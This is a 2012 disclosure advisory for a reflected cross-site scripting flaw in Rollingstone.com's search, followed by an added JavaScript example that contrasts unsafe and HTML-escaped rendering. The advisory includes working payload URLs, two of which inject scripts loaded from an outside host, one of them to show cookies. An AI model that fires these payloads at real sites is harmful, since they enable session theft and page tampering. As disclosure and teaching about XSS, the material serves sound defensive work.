----------------------------------------------------------------------------------------------------
Title       : Rollingstone.com reflected Cross Site Scripting (XSS) vulnerability
Vendor      : Wenner Media (http://www.jannswenner.com/)
Description : Rollingstone.com web-site is vulnerable to reflected Cross-site Scripting attacks

Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor notified : 26-30 October and 6-8 November - no responses
- Packet Storm advisory : 15-Nov-2012

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser

Details
----------------------------------------------------------------------------------------------------
Affected functionality: site search

Test #1: Remote Javascript execution: display browser cookie
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&x=0&y=0

Test #2: Remote Javascript execution: overwrite HTML content
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2FSCRIPT%3E&x=0&y=0

Test #3: Simple alert
http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT%3Eprompt%28%2FXSS%2F%29%3C%2FSCRIPT%3E

Note: the test cases are not malicious.

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Project site: http://idash.net
Twitter: https://twitter.com/JanneFI
----------------------------------------------------------------------------------------------------
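
Added example (not part of the original advisory and not the site's code): a hypothetical search-box template rendered once without and once with attribute-context encoding, fed the Test #3 URL above. The reflection point (the value attribute of the search input) is an assumption inferred from the `">` prefix of the test cases; all function names are illustrative.

```javascript
// Added example: hypothetical search-results template, not Rollingstone.com's code.
// Assumption: the q parameter is echoed into the value attribute of the search box.

// Escape the five characters that can end an attribute value or open a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Vulnerable rendering: the decoded query value is concatenated into markup.
function renderSearchBoxUnsafe(q) {
  return `<input type="text" name="q" value="${q}">`;
}

// Hardened rendering: same template, value encoded for the HTML attribute context.
function renderSearchBoxSafe(q) {
  return `<input type="text" name="q" value="${escapeHtml(q)}">`;
}

// Extract q the way a server framework would: percent-decode, '+' becomes space.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Crude regression check: list every tag in the rendered markup other than
// the single <input> the template is meant to emit.
function injectedTags(html) {
  return (html.match(/<\/?[a-z][^>]*>/gi) || [])
    .filter((t) => !/^<input\b/i.test(t));
}

// Test #3 URL from the advisory.
const TEST3 = "http://www.rollingstone.com/search?q=%22%3E%3CSCRIPT%3Eprompt%28%2FXSS%2F%29%3C%2FSCRIPT%3E";

function demo() {
  const q = queryParam(TEST3, "q");
  const unsafe = renderSearchBoxUnsafe(q);
  const safe = renderSearchBoxSafe(q);
  return { q, unsafe, safe, unsafeTags: injectedTags(unsafe), safeTags: injectedTags(safe) };
}

console.log(demo());
```

In the unsafe rendering the decoded value closes the attribute and the input tag, so the SCRIPT element becomes markup; in the encoded rendering the same bytes stay inside the attribute value as text.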